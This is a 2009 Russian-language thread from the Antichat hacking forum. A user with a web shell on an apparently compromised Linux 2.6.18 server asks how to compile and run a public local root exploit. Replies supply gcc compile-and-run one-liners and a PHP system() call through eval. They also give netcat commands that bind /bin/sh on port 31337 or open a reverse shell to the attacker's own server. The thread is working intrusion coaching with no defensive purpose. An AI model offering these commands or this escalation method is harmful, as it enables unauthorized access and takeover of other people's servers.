Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Linux Kernel 2.6.18 vS Exploit |
18.05.2009, 22:17
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Linux Kernel 2.6.18 vS Exploit
Есть у меня веб-шелл на серваке Linux Kernel 2.6.18 и сплоит под него - http://www.milw0rm.com/exploits/5092. Со сплоитами никогда не работал, поэтому задаю такой вопрос - как его откомпилить, имея только веб-шелл (права на запись есс-но есть, но только в текущей директории)?
|
|
|
18.05.2009, 22:20
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Попробуй
Код:
gcc -o sploit sploit.c; chmod +x sploit;./sploit
НУ или
Код:
gcc -o sploit sploit.c; chmod 777 sploit;./sploit
ну или без chmod
Код:
gcc -o sploit sploit.c;./sploit
А вообще в интернете много статей.
Последний раз редактировалось Shaitan-Devil; 18.05.2009 в 22:28..
|
|
|
|
18.05.2009, 22:28
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Я видел на хакере точно такой же, только там $ был спереди, поэтому ничего не работало. Сейчас попробую.
|
|
|
|
18.05.2009, 22:31
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
тебе как минимум надо получить нормальный шелл
|
|
|
|
18.05.2009, 22:35
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
У меня Веб-Шелл, а не SSH доступ, и gcc почему-то там не пашет. Я юзаю в eval()
PHP код:
system('gcc -o exploit exploit.c;');
PS: в линухе я полный 0 |
|
|
|
18.05.2009, 22:36
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Нужно сделать бекконнект или забиндить порт.
П.С. Или нет?=\
|
|
|
|
18.05.2009, 22:44
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
это чувствуется)
$ перед командой - это пояснение, что команды выполняются с правами обычного пользователя. # - с правами рута.
У меня Веб-Шелл, а не SSH доступ
забинди порт или сделай бек-конект.
gcc почему-то там не пашет
что выведет which gcc?
|
|
|
|
18.05.2009, 23:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
which gcc cc cpp
бинди порт, например неткатом
nc -l -p 31337 -e /bin/sh &
потом у себя неткатом
nc -v www.site.com 31337
Если тебе очень повезло и фаер не блочит соединения тебя поприветствует оболчка шелла
В ином случае делай бекконект
у себя на дедике открываешь порт
nc -l -p 31337
на сервер который собираешься рутать
nc -v www.dedik.com 31337 -e /bin/sh &
Удачи =)
|
|
|
|
18.05.2009, 23:12
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Нет факт что:
-- на хосте присутсвует gcc(мало вероятно);
-- что у твоего блайнда хватит прав на доступ к gcc(более вероятно, как правило nobody и etc);
Скомпиль на локальной машине, скопирую(выстави права по необходимости) и запускай(не фактов тоже много).
|
|
|
|
18.05.2009, 23:19
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
AkyHa_MaTaTa, уж если ему не хватит прав на gcc, то ещё более вероятно что там noexec  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
